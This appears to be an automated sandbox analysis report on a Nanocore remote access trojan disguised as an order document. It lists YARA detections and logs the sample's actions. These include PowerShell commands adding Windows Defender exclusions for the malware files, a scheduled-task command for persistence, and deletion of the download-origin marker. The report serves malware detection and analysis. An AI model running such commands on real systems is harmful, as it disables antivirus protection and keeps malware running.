Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5844c9f.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5844c9f.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5800000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.5840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.#RFQ ORDER7678432213211.exe.307f090.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.#RFQ ORDER7678432213211.exe.307f090.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: #RFQ ORDER7678432213211.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: XgPYsUfalKn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.troj.evad.winEXE@15/20@0/1
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile created: C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeMutant created: \Sessions\1\BaseNamedObjects\QlFZHJmmpieHYITog
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{bf74327b-790a-4b3b-9c77-a151927b7a0c}
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFD92.tmpJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: #RFQ ORDER7678432213211.exeReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile read: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: #RFQ ORDER7678432213211.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #RFQ ORDER7678432213211.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: #RFQ ORDER7678432213211.exeStatic file information: File size 1084928 > 1048576
Source: #RFQ ORDER7678432213211.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x108600
Source: #RFQ ORDER7678432213211.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: #RFQ ORDER7678432213211.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mscorlib.pdb source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483167361.000000000124C000.00000004.00000020.sdmp
Source: Binary string: System.pdb source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483005071.0000000001217000.00000004.00000020.sdmp
Source: #RFQ ORDER7678432213211.exeStatic PE information: 0x920335CE [Sat Aug 17 19:45:18 2047 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_034A2118 push eax; mov dword ptr [esp], edx8_2_034A2254
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_034A1C88 push eax; mov dword ptr [esp], edx8_2_034A1C9C
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0658C0E1 push es; retf 18_2_0658C1CC
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 18_2_0658C1CD push es; retf 18_2_0658C1D0
Source: initial sampleStatic PE information: section name: .text entropy: 7.61140570465
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile created: C:\Users\user\AppData\Roaming\XgPYsUfalKn.exeJump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeFile opened: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
